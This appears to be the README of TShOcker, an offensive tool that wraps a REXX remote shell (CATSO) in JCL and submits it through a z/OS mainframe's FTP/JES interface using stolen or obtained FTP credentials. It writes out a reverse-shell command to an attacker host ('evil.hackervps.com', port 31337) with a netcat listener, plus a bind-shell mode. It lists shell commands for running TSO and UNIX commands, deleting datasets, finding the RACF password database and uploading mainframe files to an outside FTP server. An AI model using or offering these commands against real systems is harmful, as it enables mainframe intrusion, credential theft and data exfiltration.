TShOcker icon indicating copy to clipboard operation
TShOcker copied to clipboard

CATSO/JCL wrapper for z/OS FTP logic attack

                  .-~*~--,.   .-.
          .-~-. ./OOOOOOOOO\.'OOO`9~~-.
               `~-~''     \|||\WW=*'
          TShOcker         \||\


A REXX script (CATSO) wrapped in JCL, enveloped in Python. CATSO is a rexx script meant to act like a mini command interpreter for TSO and UNIX but accessible through a simple netcat and/or any TCP bind (like metasploit). Using FTP (and JES mode) this script generates the necessary JCL needed to execute the rexx script in a temporary dataset. All you need to do is get a mainframe FTP username and password and you're good to go.


Reverse Connection

Terminal 1: nc -l -p 31337

Terminal 2: ./TShOcker.py -r --rhost evil.hackervps.com --rport 31337 mainframe.ftp.corp.com jsmith dumbpass


./TShOcker.py -l --lport 31337 mainframe.ftp.corp.com jsmith dumbpass

nc mainframe.ftp.corp.com 31337

Enter command or 'help'> help

Core Commands

  • help Help Menu
  • exit Terminate the session
  • quit Terminate the session

Filesystem Commands

  • cat Show contents of dataset
  • cp copies a file to a new file
  • ls list datasets in HLQ
  • delete deletes a file
  • del also deletes a file
  • lsmem Lists files and members !!WARNING!! Takes time and IO

Networking Commands

  • ipconfig Display interfaces
  • ifconfig Display interfaces

System Commands

  • getuid Get current user name
  • sysinfo Remote system info (i.e OS)
  • racf Show password database location
  • execute Execute a TSO command
  • tso Execute TSO command (same as execute)
  • unix UNIX command (i.e ls -al)
  • ftp Upload a file from the mainframe to an FTP server. Syntax: host/ip user pass filename [binary]